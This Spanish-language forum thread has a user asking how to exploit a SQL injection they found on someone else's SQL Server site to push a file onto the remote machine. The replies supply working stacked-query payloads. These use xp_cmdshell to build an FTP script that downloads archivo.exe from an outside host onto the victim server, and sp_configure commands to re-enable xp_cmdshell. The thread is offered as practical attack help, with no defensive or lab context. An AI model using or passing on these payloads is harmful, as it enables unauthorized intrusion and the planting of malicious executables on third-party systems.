Buenas,encontré una pagina vulnerable a sql inyection,SQLSERVER.-
quisiera saber si hay algun metodo , que con la inyeccion subir un archivo de mi pc , al pc remoto vulnerable..
La inyeccion la hago por un formulario..-
Saludos,PHAMTOM
En el remoto caso de que el user sea admin y la inyección permita stacked querys puedes hacer:
;master..xp_cmdshell 'cmd /c echo get archivo.exe>asd.txt';
;master..xp_cmdshell 'cmd /c echo quit>>asd.txt';
;master..xp_cmdshell 'cmd /c ftp -s:asd.txt ftp.anonimo.com'
Asi te conectas al server anonimo ftp.anonimo.com y te descargas el archivo archivo.exe. Si la BBDD es mssql server 2005 puede que tengas que reactivar el xp_cmdshell. Busca en internet como se hace que ahora mismo no me acuerdo.jeje. son un par de comandos más.
Saludos!!
Creo que es...
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE